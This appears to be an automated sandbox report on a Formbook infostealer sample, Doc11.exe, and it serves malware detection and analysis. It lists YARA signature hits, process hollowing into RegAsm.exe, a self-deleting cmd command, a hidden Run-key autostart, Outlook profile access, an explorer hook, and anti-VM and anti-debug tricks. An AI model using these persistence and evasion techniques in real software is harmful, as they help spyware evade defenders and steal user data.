Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/4@3/4
Source: C:\Users\user\Desktop\Doc11.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Doc11.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
Source: C:\Users\user\Desktop\Doc11.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini
Source: C:\Users\user\Desktop\Doc11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Doc11.exe Virustotal: Detection: 34%
Source: Doc11.exe ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Users\user\Desktop\Doc11.exe 'C:\Users\user\Desktop\Doc11.exe'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
Source: C:\Windows\SysWOW64\cscript.exe File written: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini
Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Doc11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Doc11.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.227632586.0000000003100000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.443093817.0000000004CDF000.00000040.00000001.sdmp
Source: Binary string: RegAsm.pdb source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, cscript.exe
Source: Binary string: RegAsm.pdb4 source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00417C5A push esp; iretd 2_2_00417C5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CDF5 push eax; ret 2_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041658D push ds; retf 2_2_004165D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE42 push eax; ret 2_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE4B push eax; ret 2_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004176EE push cs; retf 2_2_004176F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CEAC push eax; ret 2_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0317D0D1 push ecx; ret 2_2_0317D0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C3D0D1 push ecx; ret 6_2_04C3D0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DB5C push edi; ret 6_2_00B1DB5E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DCA9 push 0D8910A8h; iretd 6_2_00B1DCAE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B17C5A push esp; iretd 6_2_00B17C5B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CDF5 push eax; ret 6_2_00B1CE48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CEAC push eax; ret 6_2_00B1CEB2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B176EE push cs; retf 6_2_00B176F7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE42 push eax; ret 6_2_00B1CE48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE4B push eax; ret 6_2_00B1CEB2
Source: initial sample Static PE information: section name: .text entropy: 7.85074481612

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\cscript.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 3FL0ZNGX9

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000B098D4 second address: 0000000000B098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000B09B3E second address: 0000000000B09B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409A70 rdtsc 2_2_00409A70
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Doc11.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Doc11.exe TID: 4472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4968 Thread sleep time: -48000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 3276 Thread sleep time: -55000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.208172847.0000000007E80000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.191541658.0000000000DB8000.00000004.00000020.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=1
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000002.452746003.000000000474A000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.210149514.0000000007FBB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.452859301.00000000047E8000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.205152318.0000000006912000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.210095455.0000000007FAC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.208055551.0000000007E03000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409A70 rdtsc 2_2_00409A70
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_03169A00
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314AE73 mov eax, dword ptr fs:[00000030h] 2_2_0314AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314AE73 mov eax, dword ptr fs:[00000030h] 2_2_0314AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314AE73 mov eax, dword ptr fs:[00000030h] 2_2_0314AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314AE73 mov eax, dword ptr fs:[00000030h] 2_2_0314AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313766D mov eax, dword ptr fs:[00000030h] 2_2_0313766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031BFE87 mov eax, dword ptr fs:[00000030h] 2_2_031BFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F0EA5 mov eax, dword ptr fs:[00000030h] 2_2_031F0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F0EA5 mov eax, dword ptr fs:[00000030h] 2_2_031F0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F0EA5 mov eax, dword ptr fs:[00000030h] 2_2_031F0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A46A7 mov eax, dword ptr fs:[00000030h] 2_2_031A46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F8ED6 mov eax, dword ptr fs:[00000030h] 2_2_031F8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03168EC7 mov eax, dword ptr fs:[00000030h] 2_2_03168EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031536CC mov eax, dword ptr fs:[00000030h] 2_2_031536CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031DFEC0 mov eax, dword ptr fs:[00000030h] 2_2_031DFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031376E2 mov eax, dword ptr fs:[00000030h] 2_2_031376E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031516E0 mov ecx, dword ptr fs:[00000030h] 2_2_031516E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312AD30 mov eax, dword ptr fs:[00000030h] 2_2_0312AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03133D34 mov eax, dword ptr fs:[00000030h] 2_2_03133D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EE539 mov eax, dword ptr fs:[00000030h] 2_2_031EE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F8D34 mov eax, dword ptr fs:[00000030h] 2_2_031F8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031AA537 mov eax, dword ptr fs:[00000030h] 2_2_031AA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03154D3B mov eax, dword ptr fs:[00000030h] 2_2_03154D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03154D3B mov eax, dword ptr fs:[00000030h] 2_2_03154D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03154D3B mov eax, dword ptr fs:[00000030h] 2_2_03154D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03147D50 mov eax, dword ptr fs:[00000030h] 2_2_03147D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03163D43 mov eax, dword ptr fs:[00000030h] 2_2_03163D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A3540 mov eax, dword ptr fs:[00000030h] 2_2_031A3540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031D3D40 mov eax, dword ptr fs:[00000030h] 2_2_031D3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314C577 mov eax, dword ptr fs:[00000030h] 2_2_0314C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314C577 mov eax, dword ptr fs:[00000030h] 2_2_0314C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315FD9B mov eax, dword ptr fs:[00000030h] 2_2_0315FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315FD9B mov eax, dword ptr fs:[00000030h] 2_2_0315FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152581 mov eax, dword ptr fs:[00000030h] 2_2_03152581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152581 mov eax, dword ptr fs:[00000030h] 2_2_03152581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152581 mov eax, dword ptr fs:[00000030h] 2_2_03152581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152581 mov eax, dword ptr fs:[00000030h] 2_2_03152581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03122D8A mov eax, dword ptr fs:[00000030h] 2_2_03122D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03122D8A mov eax, dword ptr fs:[00000030h] 2_2_03122D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03122D8A mov eax, dword ptr fs:[00000030h] 2_2_03122D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03122D8A mov eax, dword ptr fs:[00000030h] 2_2_03122D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03122D8A mov eax, dword ptr fs:[00000030h] 2_2_03122D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03151DB5 mov eax, dword ptr fs:[00000030h] 2_2_03151DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03151DB5 mov eax, dword ptr fs:[00000030h] 2_2_03151DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03151DB5 mov eax, dword ptr fs:[00000030h] 2_2_03151DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F05AC mov eax, dword ptr fs:[00000030h] 2_2_031F05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F05AC mov eax, dword ptr fs:[00000030h] 2_2_031F05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031535A1 mov eax, dword ptr fs:[00000030h] 2_2_031535A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6DC9 mov eax, dword ptr fs:[00000030h] 2_2_031A6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6DC9 mov eax, dword ptr fs:[00000030h] 2_2_031A6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6DC9 mov eax, dword ptr fs:[00000030h] 2_2_031A6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6DC9 mov ecx, dword ptr fs:[00000030h] 2_2_031A6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6DC9 mov eax, dword ptr fs:[00000030h] 2_2_031A6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6DC9 mov eax, dword ptr fs:[00000030h] 2_2_031A6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031D8DF1 mov eax, dword ptr fs:[00000030h] 2_2_031D8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0313D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0313D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
